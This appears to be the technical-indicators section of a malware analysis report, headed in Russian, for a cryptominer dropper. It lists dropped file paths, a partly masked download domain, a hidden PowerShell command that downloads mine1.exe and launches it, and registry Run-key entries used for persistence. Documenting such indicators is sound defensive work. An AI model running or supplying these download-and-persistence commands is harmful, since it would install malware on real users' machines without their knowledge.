Техническая информация
- http://sa###urity.pro/jive/mine1.exe как %appdata%\msnet.exe
- installutil.exe
- %TEMP%\abctfhghgdghghž.sct
- %APPDATA%\msnet.exe
- %TEMP%\5fe04141-d3b5-4927-8ee5-5a463e534407\njn.dll
- %TEMP%\installutil.exe
- %TEMP%\b35bc50e-fc56-4239-a7d0-bb79118b31c9\agiledotnetrt.dll
- %TEMP%\installutil.exe в %TEMP%\tmpg685.tmp
- 'sa###urity.pro':80
- http://sa###urity.pro/jive/mine1.exe
- http://sa###urity.pro/seg/inc/a1b4063380d5bc.php
- DNS ASK sa###urity.pro
- '%APPDATA%\msnet.exe'
- '%TEMP%\installutil.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://sa###urity.pro/jive/mine1.exe','%APPDATA%\msnet.exe');Start-Process '%...' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /f /v /t REG_SZ /d <SYSTEM32>\pcalua.exe" -a %APPDATA%\msnet.exe"
- '%WINDIR%\syswow64\reg.exe' ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /f /v /t REG_SZ /d <SYSTEM32>\pcalua.exe" -a %APPDATA%\msnet.exe"